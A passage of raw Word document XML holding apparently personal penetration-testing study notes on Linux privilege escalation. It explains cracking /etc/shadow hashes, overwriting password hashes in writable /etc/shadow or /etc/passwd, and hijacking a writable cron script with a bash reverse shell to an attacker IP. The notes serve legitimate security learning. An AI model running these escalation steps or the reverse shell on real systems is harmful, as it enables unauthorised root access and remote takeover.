          <w:p w14:paraId="0C67D8F4" w14:textId="77777777" w:rsidR="00DE237F" w:rsidRDefault="00DE237F" w:rsidP="001B52BB">
            <w:pPr>
              <w:jc w:val="center"/>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="8024" w:type="dxa"/>
            <w:tcBorders>
              <w:left w:val="single" w:sz="12" w:space="0" w:color="auto"/>
              <w:bottom w:val="single" w:sz="24" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="24" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
          </w:tcPr>
          <w:p w14:paraId="06FAC88F" w14:textId="77777777" w:rsidR="00DE237F" w:rsidRPr="001E0F42" w:rsidRDefault="00DE237F" w:rsidP="001B52BB"/>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="66CCCB79" w14:textId="77777777" w:rsidR="005366B4" w:rsidRDefault="005366B4"/>
    <w:p w14:paraId="71F6351E" w14:textId="77777777" w:rsidR="005366B4" w:rsidRDefault="005366B4">
      <w:r>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p w14:paraId="049E57B8" w14:textId="1D4EDC64" w:rsidR="005366B4" w:rsidRDefault="005366B4" w:rsidP="005366B4">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">Specific Exploits and Escalation: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Weak File Permissions</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5366B4" w14:paraId="5EB9076B" w14:textId="77777777" w:rsidTr="00604F8E">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="611" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="24" w:space="0" w:color="auto"/>
              <w:left w:val="single" w:sz="24" w:space="0" w:color="auto"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="12" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="00FFFF"/>
          </w:tcPr>
          <w:p w14:paraId="4997E537" w14:textId="7464C7A3" w:rsidR="005366B4" w:rsidRDefault="005366B4" w:rsidP="00604F8E">
            <w:r>
              <w:t>9</w:t>
            </w:r>
            <w:r>
              <w:t>4</w:t>
            </w:r>
            <w:r>
              <w:t>.a</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2392" w:type="dxa"/>
            <w:vMerge w:val="restart"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="24" w:space="0" w:color="auto"/>
              <w:left w:val="single" w:sz="12" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="12" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="CCFFFF"/>
          </w:tcPr>
          <w:p w14:paraId="52FC7E7A" w14:textId="77777777" w:rsidR="005366B4" w:rsidRDefault="005366B4" w:rsidP="00604F8E">
            <w:pPr>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:t>Weak File Permissions:</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="63415D3B" w14:textId="7A1EF073" w:rsidR="005366B4" w:rsidRPr="005366B4" w:rsidRDefault="005366B4" w:rsidP="00604F8E">
            <w:pPr>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:i/>
                <w:iCs/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="005366B4">
              <w:rPr>
                <w:i/>
                <w:iCs/>
              </w:rPr>
              <w:t>/etc/shadow</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="8024" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="24" w:space="0" w:color="auto"/>
              <w:left w:val="single" w:sz="12" w:space="0" w:color="auto"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="24" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
          </w:tcPr>
          <w:p w14:paraId="3B4A8D41" w14:textId="77777777" w:rsidR="005366B4" w:rsidRPr="005366B4" w:rsidRDefault="005366B4" w:rsidP="00604F8E">
            <w:pPr>
              <w:rPr>
                <w:color w:val="7030A0"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="005366B4">
              <w:rPr>
                <w:color w:val="7030A0"/>
              </w:rPr>
              <w:t>IF YOU HAVE ACCESS TO THE /etc/shadow FILE ONCE GAINING A FOOTHOLD, IT MAY BE POSSIBLE TO ACCESS THIS FILE IF ITS PERMISSIONS IS MISCONFIGURED.</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="17FCF7BF" w14:textId="3D88EBC9" w:rsidR="005366B4" w:rsidRPr="00B959BD" w:rsidRDefault="005366B4" w:rsidP="00604F8E">
            <w:r>
              <w:t>If the file has read permissions granted, take the first string after the user’s name (in-between the first and second colon) and use john the ripper to crack it (see john the ripper page).</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="005366B4" w14:paraId="2F96FF82" w14:textId="77777777" w:rsidTr="00604F8E">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="611" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:left w:val="single" w:sz="24" w:space="0" w:color="auto"/>
              <w:bottom w:val="single" w:sz="2" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="12" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="00FFFF"/>
          </w:tcPr>
          <w:p w14:paraId="7B5E7413" w14:textId="468D4E09" w:rsidR="005366B4" w:rsidRDefault="005366B4" w:rsidP="00604F8E">
            <w:r>
              <w:t>9</w:t>
            </w:r>
            <w:r>
              <w:t>4</w:t>
            </w:r>
            <w:r>
              <w:t>.b</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2392" w:type="dxa"/>
            <w:vMerge/>
            <w:tcBorders>
              <w:left w:val="single" w:sz="12" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="12" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="CCFFFF"/>
          </w:tcPr>
          <w:p w14:paraId="719805CB" w14:textId="77777777" w:rsidR="005366B4" w:rsidRDefault="005366B4" w:rsidP="00604F8E">
            <w:pPr>
              <w:jc w:val="center"/>
            </w:pP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32AA3117" w14:textId="77777777" w:rsidR="005366B4" w:rsidRDefault="005366B4" w:rsidP="00604F8E">
            <w:r>
              <w:t xml:space="preserve">If the file has </w:t>
            </w:r>
            <w:proofErr w:type="gramStart"/>
            <w:r>
              <w:t>write</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r>
              <w:t xml:space="preserve"> permissions granted,</w:t>
            </w:r>
            <w:r w:rsidR="00CF4F15">
              <w:t xml:space="preserve"> generate a new password hash:</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="5578DC19" w14:textId="77777777" w:rsidR="00CF4F15" w:rsidRDefault="00CF4F15" w:rsidP="00604F8E">
            <w:pPr>
              <w:rPr>
                <w:color w:val="00B050"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="00CF4F15">
              <w:rPr>
                <w:color w:val="FF0000"/>
              </w:rPr>
              <w:t>mkpasswd</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r w:rsidRPr="00CF4F15">
              <w:rPr>
                <w:color w:val="00B0F0"/>
              </w:rPr>
              <w:t xml:space="preserve">-m sha-512 </w:t>
            </w:r>
            <w:r w:rsidRPr="00CF4F15">
              <w:rPr>
                <w:color w:val="00B050"/>
              </w:rPr>
              <w:t>PASSWORD</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="240EC5B5" w14:textId="77777777" w:rsidR="00CF4F15" w:rsidRPr="00CF4F15" w:rsidRDefault="00CF4F15" w:rsidP="00604F8E">
            <w:r w:rsidRPr="00CF4F15">
              <w:t>Edit the file, replacing the password of the user you want with this new hash. You may be able to use vim for this:</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="4B352161" w14:textId="77777777" w:rsidR="00CF4F15" w:rsidRDefault="00CF4F15" w:rsidP="00604F8E">
            <w:pPr>
              <w:rPr>
                <w:color w:val="00B050"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="00CF4F15">
              <w:rPr>
                <w:color w:val="FF0000"/>
              </w:rPr>
              <w:t>vim</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r w:rsidRPr="00CF4F15">
              <w:rPr>
                <w:color w:val="00B050"/>
              </w:rPr>
              <w:t>/etc/shadow</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="1A00E67D" w14:textId="7AC4148F" w:rsidR="005D4FA5" w:rsidRPr="00E23A49" w:rsidRDefault="005D4FA5" w:rsidP="00604F8E">
            <w:r>
              <w:t>Use ‘i’ to enter insert mode on vim, delete the old hash, copy and paste in the new hash. Press ‘esc’ to enter command mode, type :wq to save the changes and quit.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="005366B4" w14:paraId="78358AEF" w14:textId="77777777" w:rsidTr="00604F8E">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="611" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:left w:val="single" w:sz="24" w:space="0" w:color="auto"/>
              <w:bottom w:val="single" w:sz="2" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="12" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="00FFFF"/>
          </w:tcPr>
          <w:p w14:paraId="4ED4FD9C" w14:textId="74006C97" w:rsidR="005366B4" w:rsidRDefault="005366B4" w:rsidP="00604F8E">
            <w:r>
              <w:t>9</w:t>
            </w:r>
            <w:r>
              <w:t>4</w:t>
            </w:r>
            <w:r>
              <w:t>.c</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2392" w:type="dxa"/>
            <w:tcBorders>
              <w:left w:val="single" w:sz="12" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="12" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="CCFFFF"/>
          </w:tcPr>
          <w:p w14:paraId="5C122C47" w14:textId="01E200F9" w:rsidR="005366B4" w:rsidRPr="005D4FA5" w:rsidRDefault="005D4FA5" w:rsidP="00604F8E">
            <w:pPr>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:i/>
                <w:iCs/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="005D4FA5">
              <w:rPr>
                <w:i/>
                <w:iCs/>
              </w:rPr>
              <w:t>/etc/passwd</w:t>
            </w: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35E87523" w14:textId="77777777" w:rsidR="005366B4" w:rsidRDefault="005D4FA5" w:rsidP="00604F8E">
            <w:r>
              <w:t xml:space="preserve">If the file has </w:t>
            </w:r>
            <w:proofErr w:type="gramStart"/>
            <w:r>
              <w:t>write</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r>
              <w:t xml:space="preserve"> permissions granted, and the version of Linux running allows password hashes to be stored there we can generate our own password hash:</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="6B4D4F2B" w14:textId="77777777" w:rsidR="005D4FA5" w:rsidRDefault="005D4FA5" w:rsidP="00604F8E">
            <w:pPr>
              <w:rPr>
                <w:color w:val="00B050"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:tab/>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r w:rsidRPr="005D4FA5">
              <w:rPr>
                <w:color w:val="FF0000"/>
              </w:rPr>
              <w:t xml:space="preserve">openssl </w:t>
            </w:r>
            <w:r w:rsidRPr="005D4FA5">
              <w:rPr>
                <w:color w:val="00B0F0"/>
              </w:rPr>
              <w:t xml:space="preserve">passwd </w:t>
            </w:r>
            <w:r w:rsidRPr="005D4FA5">
              <w:rPr>
                <w:color w:val="00B050"/>
              </w:rPr>
              <w:t>PASSWORD</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="343DF414" w14:textId="77777777" w:rsidR="005D4FA5" w:rsidRDefault="005D4FA5" w:rsidP="00604F8E">
            <w:r w:rsidRPr="00DE2093">
              <w:t>Copy the new hash, edit the /etc/password and replace the user’s hashed password between the first and second colon within the row, replacing the ‘x’</w:t>
            </w:r>
            <w:r w:rsidR="00DE2093">
              <w:t xml:space="preserve"> (if there is no password set here)</w:t>
            </w:r>
            <w:r w:rsidR="00DE2093" w:rsidRPr="00DE2093">
              <w:t>.</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="595D0F63" w14:textId="77777777" w:rsidR="00DE2093" w:rsidRDefault="00DE2093" w:rsidP="00604F8E">
            <w:pPr>
              <w:rPr>
                <w:color w:val="00B050"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="00CF4F15">
              <w:rPr>
                <w:color w:val="FF0000"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r w:rsidRPr="00CF4F15">
              <w:rPr>
                <w:color w:val="FF0000"/>
              </w:rPr>
              <w:t>vim</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r w:rsidRPr="00CF4F15">
              <w:rPr>
                <w:color w:val="00B050"/>
              </w:rPr>
              <w:t>/etc/</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:color w:val="00B050"/>
              </w:rPr>
              <w:t>passwd</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="40397B22" w14:textId="62242FFD" w:rsidR="00DE2093" w:rsidRPr="00624E45" w:rsidRDefault="00DE2093" w:rsidP="00604F8E">
            <w:r>
              <w:t>Use ‘i’ to enter insert mode on vim, delete the old hash, copy and paste in the new hash. Press ‘esc’ to enter command mode, type :wq to save the changes and quit.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="005366B4" w14:paraId="6C442C00" w14:textId="77777777" w:rsidTr="00604F8E">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="611" w:type="dxa"/>
            <w:tcBorders>
              <w:left w:val="single" w:sz="24" w:space="0" w:color="auto"/>
              <w:bottom w:val="single" w:sz="24" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="12" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="00FFFF"/>
          </w:tcPr>
          <w:p w14:paraId="391FECE2" w14:textId="77777777" w:rsidR="005366B4" w:rsidRDefault="005366B4" w:rsidP="00604F8E"/>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2392" w:type="dxa"/>
            <w:tcBorders>
              <w:left w:val="single" w:sz="12" w:space="0" w:color="auto"/>
              <w:bottom w:val="single" w:sz="24" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="12" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="CCFFFF"/>
          </w:tcPr>
          <w:p w14:paraId="18CF6FE6" w14:textId="77777777" w:rsidR="005366B4" w:rsidRDefault="005366B4" w:rsidP="00604F8E">
            <w:pPr>
              <w:jc w:val="center"/>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="8024" w:type="dxa"/>
            <w:tcBorders>
              <w:left w:val="single" w:sz="12" w:space="0" w:color="auto"/>
              <w:bottom w:val="single" w:sz="24" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="24" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
          </w:tcPr>
          <w:p w14:paraId="69047D34" w14:textId="77777777" w:rsidR="005366B4" w:rsidRPr="001E0F42" w:rsidRDefault="005366B4" w:rsidP="00604F8E"/>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="45E103E0" w14:textId="77777777" w:rsidR="00C84DDE" w:rsidRDefault="00C84DDE"/>
    <w:p w14:paraId="18B649A8" w14:textId="77777777" w:rsidR="00C84DDE" w:rsidRDefault="00C84DDE">
      <w:r>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p w14:paraId="2E1D3AD2" w14:textId="584F4ABE" w:rsidR="00C84DDE" w:rsidRDefault="00C84DDE" w:rsidP="00C84DDE">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">Specific Exploits and Escalation: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">Cron </w:t>
      </w:r>
      <w:r w:rsidR="00BA181C">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>J</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>obs</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="TableGrid"/>
        <w:tblpPr w:leftFromText="180" w:rightFromText="180" w:vertAnchor="page" w:horzAnchor="margin" w:tblpY="1081"/>
        <w:tblW w:w="11027" w:type="dxa"/>
        <w:tblLook w:val="04A0" w:firstRow="1" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:noHBand="0" w:noVBand="1"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="611"/>
        <w:gridCol w:w="2392"/>
        <w:gridCol w:w="8024"/>
      </w:tblGrid>
      <w:tr w:rsidR="00C84DDE" w14:paraId="36E8A468" w14:textId="77777777" w:rsidTr="00604F8E">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="611" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="24" w:space="0" w:color="auto"/>
              <w:left w:val="single" w:sz="24" w:space="0" w:color="auto"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="12" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="00FFFF"/>
          </w:tcPr>
          <w:p w14:paraId="32664A94" w14:textId="6AD12275" w:rsidR="00C84DDE" w:rsidRDefault="00C84DDE" w:rsidP="00604F8E">
            <w:r>
              <w:t>9</w:t>
            </w:r>
            <w:r>
              <w:t>5</w:t>
            </w:r>
            <w:r>
              <w:t>.a</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2392" w:type="dxa"/>
            <w:vMerge w:val="restart"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="24" w:space="0" w:color="auto"/>
              <w:left w:val="single" w:sz="12" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="12" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="CCFFFF"/>
          </w:tcPr>
          <w:p w14:paraId="4E3E83F0" w14:textId="00644693" w:rsidR="00C84DDE" w:rsidRDefault="00BA181C" w:rsidP="00604F8E">
            <w:pPr>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r w:rsidRPr="00BA181C">
              <w:t>Cron Jobs</w:t>
            </w:r>
            <w:r w:rsidR="00DB1C6D">
              <w:br/>
              <w:t>File Permissions</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="0D9BA638" w14:textId="77777777" w:rsidR="006B2D1A" w:rsidRDefault="006B2D1A" w:rsidP="00604F8E">
            <w:pPr>
              <w:jc w:val="center"/>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="75F97B11" w14:textId="143C9EAA" w:rsidR="006B2D1A" w:rsidRPr="006B2D1A" w:rsidRDefault="006B2D1A" w:rsidP="00604F8E">
            <w:pPr>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:i/>
                <w:iCs/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:i/>
                <w:iCs/>
              </w:rPr>
              <w:t>(</w:t>
            </w:r>
            <w:r w:rsidRPr="006B2D1A">
              <w:rPr>
                <w:i/>
                <w:iCs/>
              </w:rPr>
              <w:t>If there isn’t any set</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:i/>
                <w:iCs/>
              </w:rPr>
              <w:t xml:space="preserve"> in crontab</w:t>
            </w:r>
            <w:r w:rsidRPr="006B2D1A">
              <w:rPr>
                <w:i/>
                <w:iCs/>
              </w:rPr>
              <w:t>, this technique won’t work.</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:i/>
                <w:iCs/>
              </w:rPr>
              <w:t>)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="8024" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="24" w:space="0" w:color="auto"/>
              <w:left w:val="single" w:sz="12" w:space="0" w:color="auto"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="24" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
          </w:tcPr>
          <w:p w14:paraId="509673E3" w14:textId="7F069F02" w:rsidR="00C84DDE" w:rsidRPr="00B959BD" w:rsidRDefault="00BA181C" w:rsidP="00604F8E">
            <w:r>
              <w:t xml:space="preserve">Cron jobs are scheduled programs or scripts that run at specific times or intervals. They are stored in crontabs along with their configuration. The system-wide crontab can be found at </w:t>
            </w:r>
            <w:r w:rsidRPr="00BA181C">
              <w:rPr>
                <w:i/>
                <w:iCs/>
              </w:rPr>
              <w:t>/etc/crontab</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve">. This can be seen by using the </w:t>
            </w:r>
            <w:r w:rsidRPr="00BA181C">
              <w:rPr>
                <w:color w:val="FF0000"/>
              </w:rPr>
              <w:t xml:space="preserve">cat </w:t>
            </w:r>
            <w:r>
              <w:t>command.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00C84DDE" w14:paraId="0797C4E9" w14:textId="77777777" w:rsidTr="00604F8E">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="611" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:left w:val="single" w:sz="24" w:space="0" w:color="auto"/>
              <w:bottom w:val="single" w:sz="2" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="12" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="00FFFF"/>
          </w:tcPr>
          <w:p w14:paraId="15F7F490" w14:textId="1AC0C4ED" w:rsidR="00C84DDE" w:rsidRDefault="00C84DDE" w:rsidP="00604F8E">
            <w:r>
              <w:t>9</w:t>
            </w:r>
            <w:r>
              <w:t>5</w:t>
            </w:r>
            <w:r>
              <w:t>.b</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2392" w:type="dxa"/>
            <w:vMerge/>
            <w:tcBorders>
              <w:left w:val="single" w:sz="12" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="12" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="CCFFFF"/>
          </w:tcPr>
          <w:p w14:paraId="646DF66D" w14:textId="77777777" w:rsidR="00C84DDE" w:rsidRDefault="00C84DDE" w:rsidP="00604F8E">
            <w:pPr>
              <w:jc w:val="center"/>
            </w:pP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335C4335" w14:textId="758B27C9" w:rsidR="00C84DDE" w:rsidRDefault="00BA181C" w:rsidP="00604F8E">
            <w:r>
              <w:t xml:space="preserve">Use the </w:t>
            </w:r>
            <w:r w:rsidRPr="00BA181C">
              <w:rPr>
                <w:color w:val="FF0000"/>
              </w:rPr>
              <w:t xml:space="preserve">locate </w:t>
            </w:r>
            <w:r>
              <w:t>command to find the location of any of the jobs set to run after viewing the crontab.</w:t>
            </w:r>
            <w:r w:rsidR="003567E9">
              <w:t xml:space="preserve"> Next, use the </w:t>
            </w:r>
            <w:r w:rsidR="003567E9" w:rsidRPr="003567E9">
              <w:rPr>
                <w:color w:val="FF0000"/>
              </w:rPr>
              <w:t xml:space="preserve">ls </w:t>
            </w:r>
            <w:r w:rsidR="003567E9">
              <w:t>command to see if there are exploitable opportunities:</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="5EA58DE2" w14:textId="77777777" w:rsidR="003567E9" w:rsidRDefault="003567E9" w:rsidP="00604F8E">
            <w:pPr>
              <w:rPr>
                <w:color w:val="00B050"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="003567E9">
              <w:rPr>
                <w:color w:val="FF0000"/>
              </w:rPr>
              <w:t xml:space="preserve">ls </w:t>
            </w:r>
            <w:r w:rsidRPr="003567E9">
              <w:rPr>
                <w:color w:val="00B0F0"/>
              </w:rPr>
              <w:t xml:space="preserve">-l </w:t>
            </w:r>
            <w:r w:rsidRPr="003567E9">
              <w:rPr>
                <w:color w:val="00B050"/>
              </w:rPr>
              <w:t>/usr/local/bin/FILE.EXTENSION</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="28726E6E" w14:textId="77777777" w:rsidR="003567E9" w:rsidRPr="003567E9" w:rsidRDefault="003567E9" w:rsidP="00604F8E">
            <w:r w:rsidRPr="003567E9">
              <w:t xml:space="preserve">If you have </w:t>
            </w:r>
            <w:proofErr w:type="gramStart"/>
            <w:r w:rsidRPr="003567E9">
              <w:t>write</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r w:rsidRPr="003567E9">
              <w:t xml:space="preserve"> permissions, we can use a word editor such as vim to edit the script:</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="0BF18B20" w14:textId="77777777" w:rsidR="003567E9" w:rsidRDefault="003567E9" w:rsidP="00604F8E">
            <w:pPr>
              <w:rPr>
                <w:color w:val="00B050"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="003567E9">
              <w:rPr>
                <w:color w:val="FF0000"/>
              </w:rPr>
              <w:t xml:space="preserve">vim </w:t>
            </w:r>
            <w:r w:rsidRPr="003567E9">
              <w:rPr>
                <w:color w:val="00B050"/>
              </w:rPr>
              <w:t>/usr/local/bin/FILE.EXTENSION</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="126A41A9" w14:textId="77777777" w:rsidR="003567E9" w:rsidRDefault="003567E9" w:rsidP="00604F8E">
            <w:r>
              <w:t>Replacing it with something like:</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="3CE64D19" w14:textId="253A6157" w:rsidR="003567E9" w:rsidRPr="006B2D1A" w:rsidRDefault="003567E9" w:rsidP="00604F8E">
            <w:pPr>
              <w:rPr>
                <w:i/>
                <w:iCs/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="006B2D1A">
              <w:rPr>
                <w:i/>
                <w:iCs/>
                <w:color w:val="FF0000"/>
              </w:rPr>
              <w:t>#!/bin/bash</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="06EA4E55" w14:textId="4BB50B77" w:rsidR="003567E9" w:rsidRPr="006B2D1A" w:rsidRDefault="003567E9" w:rsidP="00604F8E">
            <w:pPr>
              <w:rPr>
                <w:i/>
                <w:iCs/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="006B2D1A">
              <w:rPr>
                <w:i/>
                <w:iCs/>
                <w:color w:val="FF0000"/>
              </w:rPr>
              <w:t>bash</w:t>
            </w:r>
            <w:r w:rsidRPr="006B2D1A">
              <w:rPr>
                <w:i/>
                <w:iCs/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r w:rsidRPr="006B2D1A">
              <w:rPr>
                <w:i/>
                <w:iCs/>
                <w:color w:val="FF0000"/>
              </w:rPr>
              <w:t>-i &gt;&amp; /dev/tcp/</w:t>
            </w:r>
            <w:r w:rsidRPr="006B2D1A">
              <w:rPr>
                <w:i/>
                <w:iCs/>
                <w:color w:val="00B050"/>
              </w:rPr>
              <w:t>OUR.IP.ADD.RESS</w:t>
            </w:r>
            <w:r w:rsidRPr="006B2D1A">
              <w:rPr>
                <w:i/>
                <w:iCs/>
                <w:color w:val="FF0000"/>
              </w:rPr>
              <w:t>/</w:t>
            </w:r>
            <w:r w:rsidRPr="006B2D1A">
              <w:rPr>
                <w:i/>
                <w:iCs/>
                <w:color w:val="00B050"/>
              </w:rPr>
              <w:t>PORT</w:t>
            </w:r>
            <w:r w:rsidR="006A68EF" w:rsidRPr="006B2D1A">
              <w:rPr>
                <w:i/>
                <w:iCs/>
